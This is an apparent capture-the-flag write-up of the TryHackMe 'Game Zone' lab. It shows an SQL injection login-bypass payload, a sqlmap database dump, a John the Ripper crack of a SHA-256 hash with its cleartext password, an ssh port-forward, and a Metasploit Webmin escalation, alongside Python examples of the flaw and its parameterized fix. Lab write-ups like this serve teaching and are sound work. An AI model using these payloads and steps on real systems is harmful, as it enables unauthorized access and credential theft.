- Link: https://tryhackme.com/room/gamezone
- Difficulty: Easy
- Target: user and root flags on a Linux server
- Highlights: leveraging port forwarding to expose a web service from behind a firewall, using sqlmap to find a username and hashed password
- Tools used: nmap, dirb, Burp Suite, sqlmap, John the Ripper, ssh, Metasploit
- Tags: sqli, hashcracking, metasploit, ssh tunnel
In this Linux capture-the-flag (CTF) challenge we are tasked with hacking into a game review website’s server and finding a way to gain root privileges. Let’s go!
export targetIP=10.10.163.79
export myIP=10.6.2.23
Let’s kick things off with our standard nmap and dirb scans. We’ll let these run while we walk the website looking for interesting leads.
To find the name of the character on the main page, we can do a reverse image search on Google. I’ve played this title before but forgot his name, so I just googled “hitman game character name” to find the answer to our first question. (agent 47)
NMAP SCAN RESULTS
DIRB SCAN RESULTS
WALK THE WEBSITE
We see a login portal on the landing page of our target IP. We also look at the /images folder that dirb found, but nothing remarkable is there at first glance.
Because the login form passes the username into its SQL query without sanitizing it, the login can be bypassed by entering the following username and leaving the password blank:
' or 1=1 -- -
The login trick works, and we are presented with a search box.
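As an added illustration (not code from the original write-up or from the room), here is a small SQLite-backed model of the portal’s login that shows why the username payload above gets past the check when the query is built by string concatenation, and why a parameterized query does not. The table schema and the sample account are constructed; the stored digest is computed at runtime.

```python
import hashlib
import sqlite3
from typing import Optional

# Constructed stand-in for the portal's user table (hypothetical schema; the
# real site runs MySQL, SQLite is used here so the example runs offline).
def make_db() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (username TEXT, pwd TEXT)")
    # The stored value is the SHA-256 of the password, computed here, not copied.
    digest = hashlib.sha256(b"videogamer124").hexdigest()
    con.execute("INSERT INTO users VALUES (?, ?)", ("agent47", digest))
    return con

def login_vulnerable(con: sqlite3.Connection, username: str, password: str) -> Optional[str]:
    """Query assembled by string concatenation: the username becomes SQL."""
    digest = hashlib.sha256(password.encode()).hexdigest()
    sql = ("SELECT username FROM users WHERE username = '" + username +
           "' AND pwd = '" + digest + "'")
    # With username "' or 1=1 -- -" the statement becomes
    #   ... WHERE username = '' or 1=1 -- -' AND pwd = '<digest>'
    # Everything after "--" is a comment, so the password is never checked
    # and "or 1=1" matches every row; the first user comes back.
    row = con.execute(sql).fetchone()
    return row[0] if row else None

def login_safe(con: sqlite3.Connection, username: str, password: str) -> Optional[str]:
    """Parameterized query: the driver binds the values, they never become SQL."""
    digest = hashlib.sha256(password.encode()).hexdigest()
    sql = "SELECT username FROM users WHERE username = ? AND pwd = ?"
    row = con.execute(sql, (username, digest)).fetchone()
    return row[0] if row else None

BYPASS_PAYLOAD = "' or 1=1 -- -"   # the username used in the write-up

if __name__ == "__main__":
    db = make_db()
    print("vulnerable:   ", login_vulnerable(db, BYPASS_PAYLOAD, ""))
    print("parameterized:", login_safe(db, BYPASS_PAYLOAD, ""))
```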
INITIAL FOOTHOLD – INTERCEPT A POST REQUEST WITH BURP
Let’s fire up burpsuite now to intercept an HTTP POST request made with this search box.
Intercepted HTTP POST request:
POST /portal.php HTTP/1.1
Host: 10.10.134.32
Content-Length: 17
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://10.10.134.32
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://10.10.134.32/portal.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=v82et4dbp2fsr264tqhipmr1k5
Connection: close

searchitem=hitman
We’ll save this request in a file titled
If you use burpsuite to capture the request, you can directly download it as a file. A word of caution: using Firefox developer mode to intercept and save the request saved it double-spaced for some reason, and I suspect the formatting caused it to screw up the
USING SQLMAP TO EXTRACT THE FULL DATABASE
With the following command, we can instruct sqlmap to attempt to download (dump) the entire database and search for a login username and hashed password.
sqlmap -r req --dbms=mysql --dump --level 5
It worked! We see that the database stores a list of game titles and reviews.
The most interesting piece of information here is the pwd column. It looks like a password hash. We can use an online hash identifier such as hashes.com to find out the hash type.
+------------------------------------------------------------------+----------+
| pwd                                                              | username |
+------------------------------------------------------------------+----------+
| ab5db915fc9cea6c78df88106c6500c57f2b52901ca6c0c6218f04122c3efd14 | agent47  |
+------------------------------------------------------------------+----------+
We can see that it is probably a SHA-256 hash (64 hex characters). Now it’s time to …
CRACK THAT HASH WITH JOHN (THE RIPPER)!
john hash.txt --wordlist=/home/kalisurfer/hacking-tools/rockyou.txt --format=Raw-SHA256
rockyou.txt is a legendary leaked database of passwords (14,344,391 passwords!)
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-SHA256 [SHA256 512/512 AVX512BW 16x])
Warning: poor OpenMP scalability for this hash type, consider --fork=4
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
videogamer124    (?)
1g 0:00:00:00 DONE (2023-01-14 12:23) 1.449g/s 4369Kp/s 4369Kc/s 4369KC/s vimivera..tyler912
Use the "--show --format=Raw-SHA256" options to display all of the cracked passwords reliably
Session completed
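To show what the two steps above (identifying the hash type, then cracking it) amount to, here is an added example that is not part of the original write-up: a digest-length guess like the one a hash identifier site makes, and a dictionary attack on a raw (unsalted) SHA-256, which costs exactly one hash per candidate and is why john finishes in under a second. The wordlist is a constructed stand-in for a few rockyou.txt lines.

```python
import hashlib
from typing import Iterable, Optional

# Digest-length heuristic, the same first cut a hash-identifier site makes.
# Length alone is only a hint: several algorithms share each length.
HEX_LENGTH_HINTS = {32: "MD5", 40: "SHA-1", 64: "SHA-256", 128: "SHA-512"}

def guess_hash_type(digest_hex: str) -> Optional[str]:
    h = digest_hex.strip().lower()
    if not h or any(c not in "0123456789abcdef" for c in h):
        return None
    return HEX_LENGTH_HINTS.get(len(h))

def sha256_hex(word: str) -> str:
    return hashlib.sha256(word.encode()).hexdigest()

def crack_raw_sha256(digest_hex: str, wordlist: Iterable[str]) -> Optional[str]:
    """Dictionary attack on an unsalted SHA-256: hash each candidate once,
    compare, stop at the first match. No salt means no per-user work and
    nothing stops precomputed tables either."""
    target = digest_hex.strip().lower()
    for word in wordlist:
        if sha256_hex(word.rstrip("\n")) == target:
            return word
    return None

# Hash exactly as it appears in the sqlmap dump above.
PAGE_HASH = "ab5db915fc9cea6c78df88106c6500c57f2b52901ca6c0c6218f04122c3efd14"

# Constructed stand-in for a few rockyou.txt lines (the real file has millions).
SAMPLE_WORDLIST = ["123456", "password", "vimivera", "videogamer124", "tyler912"]

if __name__ == "__main__":
    print("type:", guess_hash_type(PAGE_HASH))
    print("cracked:", crack_raw_sha256(PAGE_HASH, SAMPLE_WORDLIST))
```

With the real rockyou.txt the same loop is `crack_raw_sha256(PAGE_HASH, open("rockyou.txt", errors="ignore"))`.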
SSH INTO THE BOX AND GRAB THE USER FLAG
We are in!
agent47@gamezone:~$ cat user.txt 64—---digits omitted—--------5c
This box requires a two-step process: port forwarding via ssh, then throwing a reverse meterpreter shell to a listener.
Let’s check for hidden services that may be listening behind a firewall. We can use the ss utility to list every listening TCP and UDP socket on the target, with numeric ports and the owning process where visible.
agent47@gamezone:~$ ss -t -u -l -p -n
Netid State  Recv-Q Send-Q Local Address:Port Peer Address:Port
udp   UNCONN 0      0      *:10000            *:*
This first line is curious. It appears that a service is listening on port 10000 of the target system, one that was not reachable from outside.
Let’s go ahead and port forward to see what is lying behind the firewall. Port 10000 is typically used by server administration tools such as Webmin.
SET UP PORT FORWARD WITH SSH
The following command opens a local port forward over ssh, so that port 10000 on our own machine is tunneled to port 10000 on the target’s loopback interface:
ssh -L 10000:localhost:10000 agent47@$targetIP
password: —-cracked-password—-
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.4.0-159-generic x86_64)
 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage
109 packages can be updated.
68 updates are security updates.
Last login: Sat Jan 14 18:21:17 2023 from 10.6.2.23
agent47@gamezone:~$
We are connected now with port forwarding in place. Let’s navigate in our browser to
After logging in with the same username:password combination we used with ssh, we are given access to a webmin portal.
PRIVESC WITH METASPLOIT
webmin in Metasploit brings up the following Metasploit module.
Let’s use it and set it up with the following options:
Let it rip!
And it hands us a meterpreter session. We can use the following command to interact with the meterpreter on session 0:
sessions -i 0
And we now have our root flag! Thanks for reading this write-up.
I am a freelance ethical hacker/penetration tester. I have extensive experience in penetration testing and vulnerability assessments on web apps and servers. I am also fluent in Mandarin and have 15 years of experience as an edTech integration specialist, curriculum designer, and foreign language teacher. Here’s my personal website.